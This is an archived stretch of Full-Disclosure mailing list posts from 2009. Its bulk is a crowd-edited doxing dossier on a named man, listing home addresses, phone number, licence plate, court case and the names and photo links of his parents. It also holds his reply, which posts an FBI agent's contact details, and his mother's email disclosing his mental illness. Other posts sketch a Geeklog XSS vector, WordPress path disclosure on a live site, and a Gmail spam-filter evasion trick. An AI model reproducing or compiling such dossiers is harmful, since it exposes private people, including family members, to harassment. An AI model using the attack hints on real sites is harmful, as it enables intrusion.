> ============================= > - Bantown > - Buttes > - EFnet #down > - SASS (Something Awful Sycophant Squad) > - Encyclopedia Dramatica > - SealPac > > Known Enemies > ============================= > Organizations: > - Something Awful > - FBI > - JDL > - Possibly banks > - Any law enforcement agency he knows him > - Any jewish civil rights group that knows him > > (Know more? http://tips.fbi.gov) > > Name: > - Dennis Fetcho > - Kathy Sierra > - Rob Levin > - Richard Kyanka (lowtax) > - FreeBSDGirl > > Known business affiliations > ============================= > Sealpac. Richmond, VA > > Photo > ============================= > - > http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7 > /569px-Internet_business.jpg / > http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / > http://imgur.com/V5hkG.jpg > > Known publicity stunts > ============================= > - Toorcon2111, Cybercrime > Full URL: http://video.google.com/videoplay?docid=- > 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi > TinyURL: http://tinyurl.com/auernheimercrime > - LiveJournal hacking > - NYTimes "Mawebulence" Expose > Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- > t.html?_r=1&hp&oref=slogin > Tiny URL: http://tinyurl.com/auernheimernytimes > - He is also taking credit for Amazon hack of 2009. However this > has not been confirmed > - Corrupt: www.corrupt.org/act/interviews/weev > - Public naming by JewishReview > Full URL: http://www.jewishreview.org/local/Police-question- > two-men-about-threats-to-Jewish-community > TinyURL: http://tinyurl.com/auernheimer > Archival: http://www.webcitation.org/5jnPBPyHG > Family > =================== > Phone number: (804) 355-2889 > > Mother > - Name: Catherine Auernheimer > - Affiilations: Richmond PTA, Democratic Party > - Alias: Alyse > - Photograph: http://imgur.com/AQpSd.jpg / > (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / > (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab > 8/aqpsd.jpg) / (http://hosting11.imagecross.com/image-hosting-th- > 16/953aqpsd.jpg) / > (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / > (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / > (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / > (http://images.imagenonline.com/img_a190867.jpg) / > (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) > > Father > - Name: Mark Auernheimer > - Affiliations: SealPac > - Photograph: http://imgur.com/CEaNX.jpg / > (http://img19.imageshack.us/img19/4673/ceanx.jpg) / > (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed686 > 7/ceanx.jpg) / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) > / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / > (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / > (http://www.desiupload.com/out.php/t325734_dad.jpg) / > (http://www.imagehuge.com/out.php/i16156_dad.jpg) / > (http://images.imagenonline.com/img_a190870.jpg) > > Not posting name or pictures of the brother and sister in law > again. > > Other pertinent information > =============================- > Meltdown post after his public naming: > - Source: http://weev.livejournal.com/368013.html > - Archival: http://www.webcitation.org/5jnP71qsD > > Also weev posts his IRL name+handle on > - > http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti > me.php. > - Archival: http://www.webcitation.org/5jnPc0pNy > > http://whois.domaintools.com/sealpac-usa.com > - Archival: http://www.webcitation.org/5jnT7EULI > - Related to http://www.sealpacusa.com? > > Weev online > ============================== > - http://www.encyclopediadramatica.com/index.php/weev > - http://weev.livejournal.com > - http://the-iprophet.org > - http://theiprophet.blip.tv > - http://www.weev.net > > Email > ============================= > - gluttony at gmail.com > > Legal Notice > ============================= > - http://tips.fbi.gov > > You don't have to give your identity if you don't want to (even > if you're a victim). You have a right to an attorney if you wish to > speak with them above weev. If you don't want them to know your > linkage with weev, send anonymous tip + some form of evidence (best > you can muster) to substantiate the lead > > Licensing > ============================= > This document is licensed under the GFDL. Open source > intelligence. > http://www.gnu.org/copyleft/fdl.html > > History > ============================= > 10 / 3 / 2009 - Initial revision by GOBBLES Security > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From chuksjonia at gmail.com Sun Oct 4 08:37:54 2009 From: chuksjonia at gmail.com (Gichuki John Chuksjonia) Date: Sun, 4 Oct 2009 10:37:54 +0300 Subject: [Full-disclosure] n3td3v mentioned in a book? In-Reply-To: <20091004034441.CCBC928039@smtp.hushmail.com> References: <20091004034441.CCBC928039@smtp.hushmail.com> Message-ID: Maybe its not a Ban, maybe its a burn notice! On 10/4/09, full-censorship at hushmail.com wrote: > if this guy is mentioned in a book and we banned him? > > http://f0rb1dd3n.com/links.php > > i'm calling for a serious review of whats going on with the ban > list. > > > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosigmer at inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ From gobbles1337 at Safe-mail.net Sun Oct 4 09:03:30 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Sun, 4 Oct 2009 04:03:30 -0400 Subject: [Full-disclosure] n3td3v mentioned in a book? Message-ID: For your information, my client n3td3v is a trusted security researcher. He's cited in f0b1dd3n -- A qualified, peer-reviewed source for infosec data. -------- Original Message -------- From: Gichuki John Chuksjonia Apparently from: full-disclosure-bounces at lists.grok.org.uk To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] n3td3v mentioned in a book? Date: Sun, 4 Oct 2009 10:37:54 +0300 > Maybe its not a Ban, maybe its a burn notice! > > > > > > > > On 10/4/09, full-censorship at hushmail.com wrote: > > if this guy is mentioned in a book and we banned him? > > > > http://f0rb1dd3n.com/links.php > > > > i'm calling for a serious review of whats going on with the ban > > list. > > > > > > > > > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > -- > -- > Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P > I.T Security Analyst and Penetration Tester > infosigmer at inbox.com > > {FORUM}http://lists.my.co.ke/pipermail/security/ > http://nspkenya.blogspot.com/ > http://chuksjonia.blogspot.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From mrxisaplant at hush.com Sun Oct 4 11:16:24 2009 From: mrxisaplant at hush.com (TheLearner) Date: Sun, 04 Oct 2009 10:16:24 +0000 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #2] Message-ID: <20091004101625.00CD6118036@smtp.hushmail.com> Eyeballing Weev, An informative dossier. ============================= By FeelTheBurn Udmncrmnl Version ============================= Revision #2 Purpose ============================= You can edit this document and submit it back as a new revision. An effort by community citizens to expose this person. If you have any helpful knowledge about weev (even general) and have something to add, please reply with any editions. Abstract ============================= I noticed seclists.org was taking down information relating to the "doxing" of Andrew Auernheimer. - Original post http://seclists.org/fulldisclosure/2009/Oct/0013.html - Mirror (http://www.webcitation.org/5kD6O0OEd) Andrew is a troll in his early 20's who has hacked into various websites, harasses innocent people and companies, and actually dropped dox on this very list. Some of his victims (Which are on a list too long for even his associates to remember in entirity) consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's identity theft. Also, at the request of Girlvinyl (Sherrod DeGrippo) weev was able to nail Randi Harper (freebsdgirl) to the wall, still hocking up her name on google to this day. Andrew wants glory. He wants to be in the news. His remedy for distracting attention from his own flaws and ironies is the age-old "blame it on the jews". For him, he doesn't try to use it in a sarcastic way, merely pointing out absurb anti-semitism exists, he uses in this way to say something so extreme any attempt of criticizing him stops. In general, a puppy that wants love, but apparently can't be fixed. A Michael Crook. Real Identity ============================= - First name: Andrew - Last name: Auernheimer (mispelled as Aurenheimer sometimes) - Middle name: Alan Escher - Full name: Andrew Alan Escher Auernheimer DOB ============================= September 1st, 1985 Past schools ============================= We need this! Known address ============================= Family 2038 W Grace St Richmond, VA 23220 Criminal / 0day / Spam / Scam PO Box 61359 Sunnyvale, CA 94088 San Francisco, Los Angeles areas of California You can google his PO Box address (where he does biz from) and see complaints about fraud. Known Aliases ============================= - Weev - Wbeelsoi - Uchiha Weevlos - Weevlar - Andrew wbeelsoi - Andrew weevlos - The iProhet - TheiProphet - The-iProphet Car ============================= Drives a silver, 2000 Honda Civic License plate 6EFJ814. Most recently smog checked at Auto Chek in Anaheim, CA, on 2009/01/21, at 3:30 pm. Traffic Violation ============================= http://visionweb.occourts.org/Vision_Public/SearchCase.do case "LH419349". Date of ticket: April 17th, 2009 Details: 22107 VC I Unsafe turn or lane change Disposition: Bail forfeiture (05/28/2009) Auernheimer tried to disguise his identity as Andrew Averngimer Known Affiliations ============================= - Bantown - Buttes - EFnet #down - SASS (Something Awful Sycophant Squad) - Encyclopedia Dramatica - SealPac Known Enemies ============================= Organizations: - Something Awful - FBI - JDL - Possibly banks - Any law enforcement agency he knows him - Any jewish civil rights group that knows him Name: - Dennis Fetcho (TheFetch) - Kathy Sierra - Rob Levin (Lilo) - Richard Kyanka (lowtax) - Randi Harper (FreeBSDGirl) (Know more? http://tips.fbi.gov) Known business affiliations ============================= Sealpac. Richmond, VA (We're sorting through them as we speak) Photo ============================= - http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7 /569px-Internet_business.jpg / http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / http://imgur.com/V5hkG.jpg Known publicity stunts ============================= - Toorcon2111, Cybercrime Full URL: http://video.google.com/videoplay?docid=- 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi TinyURL: http://tinyurl.com/auernheimercrime - LiveJournal hacking - NYTimes "Mawebulence" Expose Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- t.html?_r=1&hp&oref=slogin Tiny URL: http://tinyurl.com/auernheimernytimes - He is also taking credit for Amazon hack of 2009. However this has not been confirmed - Corrupt: www.corrupt.org/act/interviews/weev - Public naming by JewishReview Full URL: http://www.jewishreview.org/local/Police-question- two-men-about-threats-to-Jewish-community TinyURL: http://tinyurl.com/auernheimer Archival: http://www.webcitation.org/5jnPBPyHG Family =================== Phone number: (804) 355-2889 Mother - Name: Catherine Auernheimer - Affiilations: Richmond PTA, Democratic Party - Alias: Alyse - Photograph: http://imgur.com/AQpSd.jpg / (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab 8/aqpsd.jpg) / (http://hosting11.imagecross.com/image-hosting-th- 16/953aqpsd.jpg) / (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / (http://images.imagenonline.com/img_a190867.jpg) / (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) Father - Name: Mark Auernheimer - Affiliations: SealPac - Photograph: http://imgur.com/CEaNX.jpg / (http://img19.imageshack.us/img19/4673/ceanx.jpg) / (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed686 7/ceanx.jpg) / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / (http://www.desiupload.com/out.php/t325734_dad.jpg) / (http://www.imagehuge.com/out.php/i16156_dad.jpg) / (http://images.imagenonline.com/img_a190870.jpg) Not posting name or pictures of the brother and sister in law again. Other pertinent information =============================- Meltdown post after his public naming: - Source: http://weev.livejournal.com/368013.html - Archival: http://www.webcitation.org/5jnP71qsD Also weev posts his IRL name+handle on - http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti me.php. - Archival: http://www.webcitation.org/5jnPc0pNy http://whois.domaintools.com/sealpac-usa.com - Archival: http://www.webcitation.org/5jnT7EULI - Related to http://www.sealpacusa.com? Weev online ============================== - http://www.encyclopediadramatica.com/index.php/weev - http://weev.livejournal.com - http://the-iprophet.org - http://theiprophet.blip.tv - http://www.weev.net Email ============================= - gluttony at gmail.com Legal Notice ============================= - http://tips.fbi.gov You don't have to give your identity if you don't want to (even if you're a victim). You have a right to an attorney if you wish to speak with them above weev. If you don't want them to know your linkage with weev, send anonymous tip + some form of evidence (best you can muster) to substantiate the lead Licensing ============================= This document is licensed under the GFDL. Open source intelligence. http://www.gnu.org/copyleft/fdl.html History ============================= 10 / 3 / 2009 - Initial revision by GOBBLES Security 10 / 4 / 2009 - Emails are flooding in. I really can't read through all this mail. Added car info, ticket info, attempted disguise attempt by Andrew. We got a lot more coming, just gotta get a few ends tied. Fixed formatting of names and monikers. From vtorre at hispasec.com Sat Oct 3 01:47:38 2009 From: vtorre at hispasec.com (Victor Antonio Torre Villahoz) Date: Sat, 03 Oct 2009 02:47:38 +0200 Subject: [Full-disclosure] [EquipoFraude] Full Path Disclosure in most wordpress' plugins [?] In-Reply-To: <4AC0C298.5050606@zerial.org> References: <4AC0C298.5050606@zerial.org> Message-ID: <4AC69F2A.7010507@hispasec.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 This not only happens in the plugins, all files in wp-admin/import/ have errors like it. I'm fix it using: if ( defined('WP_ADMIN') or defined('WP_USE_THEMES') ){ ;//coninue } else{ die(); } Fernando A. Lagos B. escribi?: > Exists an call to add_action() without validate with function_exists(). > When I run the php script directly, I get the full path of wp installation. > > Example: > [+] http://www.marco2010.cl/wp-content/plugins/akismet/akismet.php > [+] http://www.marco2010.cl/wp-content/plugins/hello.php > > > Is a bug? Is a feature? > > More details posted in my blog: > http://blog.zerial.org/seguridad/vulnerabilidad-en-la-mayoria-de-los-plugins-para-wordpress/ > (spanish) > > > cheers. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ - -- Victor Antonio Torre vtorre @ hispasec.com PGP Key ID: 74FA965E Hispasec Sistemas S.L +34 902 161 025 29590 M?laga (Spain) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJKxp8qAAoJEO8OrbJ0+pZeCwgH/iISumx4AM7EYvebIT39U3L3 /W383B2oNkqYOpsIdb2nmLWoBXgpSWdnZNhZ6Oqy0OPvqMQQjT/DLW0DoXqMPHlT MrF9ex7eJs6d0u17pMUiIHllqKg/pnWvNvPP2zwQ34L2JxdmesOcbCJ4+faRWfNg PtPkEWhj44D7qXGNFSubWYbzTr/8nxd7sBjfjedhxDBsbmSKFVTuEAgAubCRaSpO NQ3Fqls9bAUTBHGI9Yy5x/GQbqAa99v8Mvvb3BgZqQeV+cqxK4HDMqSwXPi7siFa AODX4dndrEUo5VLoHftEpha2YGQtH7Q1N+C7wxCiupCw5mkT3lhMyx8vvRyHA+0= =ZYwQ -----END PGP SIGNATURE----- From jal0h at hotmail.com Sun Oct 4 16:47:15 2009 From: jal0h at hotmail.com (Jaloh Smith) Date: Sun, 4 Oct 2009 15:47:15 +0000 Subject: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload In-Reply-To: <4AC74806.6080902@gmail.com> References: Message-ID: > > > Successful exploitation requires the ability to execute the uploaded JavaScript. > > The Geeklog Forum program can be used as an attack vector since it does not > > properly validate many $_GET / $_POST variables. > Could you give us some more details about these XSS vulnerabilities ? :) > > Cause all I see here is a RCE in the admin panel. > You confirm that there are XSS but we don't have any details about them... The easy one is when the forum allows anonymous posts and is configured for text posts. The anonymous user name is never filtered, so you can put anything there, including a reference to the javascript uploaded as the user profile image.. _________________________________________________________________ Windows Live: Keep your friends up to date with what you do online. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_1:092010 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091004/cef431aa/attachment.html From pipecharacter at gmail.com Sun Oct 4 15:53:08 2009 From: pipecharacter at gmail.com (com|com pipecharacter) Date: Sun, 4 Oct 2009 10:53:08 -0400 Subject: [Full-disclosure] gmail pipe character inconsistencies and fun Message-ID: <7836dd6c0910040753w6eae2daena2a05b584849bb06@mail.gmail.com> Gmail will not let you send email to an email address with a | in it. It just goes directly to /dev/null. For good reason - it doesn't belong in an email address. It will not let you create an email address that uses it, and if you use google apps, you can't create a "group" or mailing list with it in it. For some reason google's smtp servers are more than willing to accept an email from (or to) an email address with the pipe character in it. So if you start sending someone annoying emails to someone from an email address like "com|buggingyou at example.com", they might try to send your emails straight to the trash. So they click on the downward arrow in the top right, click on "filter messages like this", see "com|buggingyou at example.com" in the "From:" field, click on "Next Step >>", delete it, and create filter. Now a huge chunk of their email will go into the trash. If they clicked "Also apply this filter to ...", they even delete a huge chunk of the email they already had. If course there is a search in the last step, but if you have it filled up with your junk email they might never even notice what they are doing. Is this a huge security flaw? Of course not. It still shouldn't exist. The truth is it doesn't concern me at all. What really bothers me is what I said above, that you can also send TO an email address with a pipe character in it. I use a catchall on my google apps domain, and I control spam by taking all of the fake email addresses spammers have generated and create an empty mailing list with those names. Now their spam gets rejected by the smtp servers, and they know they aren't getting anywhere. My spam box tends to stay empty. That is, until a spammer started sending email to an email address with | in it. I can't do anything to stop them. Google is impossible to talk to, so I had to create a fake vulnerability to get people outside google interested in it. The original "vulnerability" I talked about does exist, and I'm sure people could have some fun with it. Which reminds me, here is another "vulnerability". If you want to spam someone with a google apps domain and a catchall, they can't block you if you send email to an email address with a | in it! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091004/e20708b4/attachment.html From gluttony at gmail.com Sun Oct 4 18:36:37 2009 From: gluttony at gmail.com (Andrew A) Date: Sun, 4 Oct 2009 12:36:37 -0500 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] In-Reply-To: <20091004013751.1A33B118036@smtp.hushmail.com> References: <20091004013751.1A33B118036@smtp.hushmail.com> Message-ID: <1865973b0910041036w434a3cb4neda732a334a9d920@mail.gmail.com> Mr. Learner, You really are hilarious. I can infer one thing from your posts: you aren't a hacker, and you find this really awkward and aren't sure how this whole ruin thing works. You have no access to data that I have not made public. Once again, the only thing you found out was my name, which I put on my livejournal. Big deal. The rest was google-able. You really don't have anything. You also don't understand how to make this whole doxdrop deal effective and dramatic. You save up everything you can until you find a piece of data which is psychologically damaging to the target. You have to essentially find them guilty of wrongdoing, like using a nonprofit to defraud people, or sucking dicks for money. This whole thing where you post somebody's parents address, big deal. Everybody's got parents unless they're orphaned. Those parents inevitably live somewhere. If I were a basement dwelling loser, this tactic might be effective. Unfortunately I live on 60 acres in the sticks and have hungry dogs and guns. Not much you can do to me. Since you are so fucking inept that you can't even find my birthday: September 1st, 1985 My former school: James Madison University Protip: Nobody in the FBI takes internet submitted tips seriously. If you want to go submit leads to the FBI, you can do it directly to the FBI agent out to get me. Craig G. Mueller Special Agent Ph: (503) 552 5473 Fa: (503) 552 5327 craig.mueller at ic.fbi.gov A photo of his business card as well, for your personal verification and convenience: http://tinypic.com/r/1j84ly/4 Earlier you called for my "methods of alluding law enforcement." (sic; You make so many errors in your English that it becomes hilariously obvious that all your sockpuppets are the same person.) I've got some funny logs to give you when you've exhausted your effort. You're going to LOL. On Sat, Oct 3, 2009 at 8:37 PM, TheLearner wrote: > Eyeballing Weev, An informative dossier. > ============================= > By FeelTheBurn Udmncrmnl > > Version > ============================= > Revision #1 > > Purpose > ============================= > You can edit this document and submit it back as a new revision. > > An effort by community citizens to expose this person. If you > have any helpful knowledge about weev (even general) and have > something to add, please reply with any editions. > > Abstract > ============================= > I noticed seclists.org was taking down information relating to the > "doxing" of Andrew Auernheimer. > - Original post > http://seclists.org/fulldisclosure/2009/Oct/0013.html > - Mirror (http://www.webcitation.org/5kD6O0OEd) > > Andrew is a troll in his early 20's who has hacked into various > websites, harasses innocent people and companies, and actually > dropped dox on this very list. Some of his victims (Which are on a > list too long for even his associates to remember in entirity) > consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's > identity theft. Also, at the request of Girlvinyl (Sherrod > DeGrippo) weev was able to nail Randi Harper (freebsdgirl) to the > wall, still hocking up her name on google to this day. > > Andrew wants glory. He wants to be in the news. His remedy for > distracting attention from his own flaws and ironies is the age-old > "blame it on the jews". > > For him, he doesn't try to use it in a sarcastic way, merely > pointing out absurb anti-semitism exists, he uses in this way to > say something so extreme any attempt of criticizing him stops. > > In general, a puppy that wants love, but apparently can't be > fixed. A Michael Crook. > > Real Identity > ============================= > - First name: Andrew > - Last name: Auernheimer (mispelled as Aurenheimer sometimes) > - Middle name: Alan Escher > - Full name: Andrew Alan Escher Auernheimer > > DOB > ============================= > We need this! > > Past schools > ============================= > We need this! > > Known address > ============================= > Family > 2038 W Grace St > Richmond, VA 23220 > > Criminal / 0day / Spam / Scam > PO Box 61359 > Sunnyvale, CA 94088 > > San Francisco, Los Angeles areas of California > > You can google his PO Box address (where he does biz from) and > see complaints about fraud. > > Known Aliases > ============================= > - Weev > - Wbeelsoi > - Uchiha Weevlos > - Weevlar > - Andrew wbeelsoi > - Andrew weevlos > - The iProhet > - TheiProphet > - The-iProphet > > Known Affiliations > ============================= > - Bantown > - Buttes > - EFnet #down > - SASS (Something Awful Sycophant Squad) > - Encyclopedia Dramatica > - SealPac > > Known Enemies > ============================= > Organizations: > - Something Awful > - FBI > - JDL > - Possibly banks > - Any law enforcement agency he knows him > - Any jewish civil rights group that knows him > > (Know more? http://tips.fbi.gov) > > Name: > - Dennis Fetcho > - Kathy Sierra > - Rob Levin > - Richard Kyanka (lowtax) > - FreeBSDGirl > > Known business affiliations > ============================= > Sealpac. Richmond, VA > > Photo > ============================= > - > http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7 > /569px-Internet_business.jpg/ > http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / > http://imgur.com/V5hkG.jpg > > Known publicity stunts > ============================= > - Toorcon2111, Cybercrime > Full URL: http://video.google.com/videoplay?docid=- > 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi > TinyURL: http://tinyurl.com/auernheimercrime > - LiveJournal hacking > - NYTimes "Mawebulence" Expose > Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- > t.html?_r=1&hp&oref=slogin > Tiny URL: http://tinyurl.com/auernheimernytimes > - He is also taking credit for Amazon hack of 2009. However this > has not been confirmed > - Corrupt: www.corrupt.org/act/interviews/weev > - Public naming by JewishReview > Full URL: http://www.jewishreview.org/local/Police-question- > two-men-about-threats-to-Jewish-community > TinyURL: http://tinyurl.com/auernheimer > Archival: http://www.webcitation.org/5jnPBPyHG > Family > =================== > Phone number: (804) 355-2889 > > Mother > - Name: Catherine Auernheimer > - Affiilations: Richmond PTA, Democratic Party > - Alias: Alyse > - Photograph: http://imgur.com/AQpSd.jpg / > (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / > (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab > 8/aqpsd.jpg) > / (http://hosting11.imagecross.com/image-hosting-th- > 16/953aqpsd.jpg) > / > (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / > (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / > (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / > (http://images.imagenonline.com/img_a190867.jpg) / > (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) > > Father > - Name: Mark Auernheimer > - Affiliations: SealPac > - Photograph: http://imgur.com/CEaNX.jpg / > (http://img19.imageshack.us/img19/4673/ceanx.jpg) / > (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed686 > 7/ceanx.jpg) > / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) > / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / > (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / > (http://www.desiupload.com/out.php/t325734_dad.jpg) / > (http://www.imagehuge.com/out.php/i16156_dad.jpg) / > (http://images.imagenonline.com/img_a190870.jpg) > > Not posting name or pictures of the brother and sister in law > again. > > Other pertinent information > =============================- > Meltdown post after his public naming: > - Source: http://weev.livejournal.com/368013.html > - Archival: http://www.webcitation.org/5jnP71qsD > > Also weev posts his IRL name+handle on > - > http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti > me.php > . > - Archival: http://www.webcitation.org/5jnPc0pNy > > http://whois.domaintools.com/sealpac-usa.com > - Archival: http://www.webcitation.org/5jnT7EULI > - Related to http://www.sealpacusa.com? > > Weev online > ============================== > - http://www.encyclopediadramatica.com/index.php/weev > - http://weev.livejournal.com > - http://the-iprophet.org > - http://theiprophet.blip.tv > - http://www.weev.net > > Email > ============================= > - gluttony at gmail.com > > Legal Notice > ============================= > - http://tips.fbi.gov > > You don't have to give your identity if you don't want to (even > if you're a victim). You have a right to an attorney if you wish to > speak with them above weev. If you don't want them to know your > linkage with weev, send anonymous tip + some form of evidence (best > you can muster) to substantiate the lead > > Licensing > ============================= > This document is licensed under the GFDL. Open source > intelligence. > http://www.gnu.org/copyleft/fdl.html > > History > ============================= > 10 / 3 / 2009 - Initial revision by GOBBLES Security > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091004/e1f49aa7/attachment.html From andfarm at gmail.com Sun Oct 4 20:22:59 2009 From: andfarm at gmail.com (Andrew Farmer) Date: Sun, 4 Oct 2009 12:22:59 -0700 Subject: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload In-Reply-To: References: Message-ID: <024C0137-1489-405D-B364-4E3343666F78@gmail.com> On 4 Oct 2009, at 08:47, Jaloh Smith wrote: > The > easy one is when the forum allows anonymous posts and is configured > for > text posts. The anonymous user name is never filtered, so you can put > anything there, including a reference to the javascript uploaded as > the > user profile image.. > > That's actually a much worse exploit than the file upload. There's no reason the script you load has to be stored locally -- it works just as well if you pull it from another domain. From gobbles1337 at Safe-mail.net Sun Oct 4 21:28:45 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Sun, 4 Oct 2009 16:28:45 -0400 Subject: [Full-disclosure] Take it from weev's mom. Message-ID: Remember, n3td3v always has the absolute finest in intelligence. -------- Original Message -------- From: Alyse Auernheimer To: fyodor at insecure.org, gobbles1337 at Safe-mail.net Subject: RE: So Weev... Date: Sat, 3 Oct 2009 02:28:54 -0400 Mr. Lyon, Paul There is a thread on your website referencing my son Andrew Auernheimer. I am totally sympathetic with those posting as my son is guilty of horrible behavior. We are ashamed of him and wish we could find him ourselves. Sadly, your contributors felt the need to "Out" our family, Andrew's parents and siblings. There are links to our younger children, one of whom is only 14, our address? and phone numbers are available, photos of the children and one reference by one poster as to a desire to rape me. The truth is everyone we know already knows we have a mentally ill child. We have made no secret of Andrew. We too are victims of Andrew. The hardest part for all of us is that he used to be normal. He loved us and was sweet and kind to his siblings. Several years ago he developed a relationship with a girl with a serious drug problem. He began by using xtc regularly and eventually graduated to LSD and heroin. About three years ago he had a mental breakdown and began hearing voices and talking to himself. He vanished from our lives. My children would log into AIM to see if he was still alive; if he was logged on too long? or not recently they would worry something had happened to him. There are references to his lavish lifestyle on this thread but the sad truth is he is paranoid schizophrenic and has been homeless a number of times. I am not excusing his pathetic behavior. My husband and I contacted law enforcement in Southern California almost a year ago as we wanted to try to "catch him" and have him forcibly committed; he needs help. Unfortunately we were told that the likely outcome would be 72 hours in a mental facility and they would let him go and since we are in no financial position to pay for mental health care for him we should just pray and forget it. I cried every night for a year but I am done crying. I can only worry about things that I can change and I really have NO information about Andrew. He never once gave us a phone number or address where we could reach him. When he left here he did not have a car or a license. I don't even know what state he might be in and frankly, I don't know if I want to anymore. I don't know if any of you have ever had a mentally ill family member. It is torture. For it to be your child is indescribably painful.? I sometimes wonder if? because our lives as a family have been dedicated to diversity and inclusion, that he may have chosen his weapons to purposely hurt us. We are tough though and committed to each other and making the most positive contributions to our world as we are able. I hope you all can find it in your hearts to please take down our personal information. If your goal is to hurt US then you have succeeded. Other than that I am not sure what the purpose of all this was. I don't cry over Andrew anymore but I found this thread when I googled my daughter looking for a school picture for her dorm room and I sobbed. She has never said an unkind word to anyone and I knew she would be devastated. We are not responsible for Andrew's totally screwed up life, he is. I was contacted erroneously on my Facebook page by someone named Anton Garcia posing as a Dreamworks Animation Employee trying to find Andrew because he was hacking Dreamworks. I suspected it was fake but I answered anyway, truthfully. I too want him to own up to his stupid behavior and take the consequences like a man. I'm sure I will be disappointed. The worst part about this is you ONLY hurt us. Andrew probably thought it was hilarious. He doesn't care what you say or do to us, he only cares about himself. He, in the past, has even made up a variety of ugly lies about us, but he is always found out. Many of the postings referred to our family as nice. This is accurate. Our other children are everything Andrew rejected, kind, smart, hard-working, dedicated to making a difference through public service, and we have left Andrew behind. There is so much need in this world and so little time that spending it on tears and regret is a colossal waste. Don't get me wrong we will always love Andrew and our hearts will forever be broken where he is concerned but what else can we do but move on. It's like the Andrew 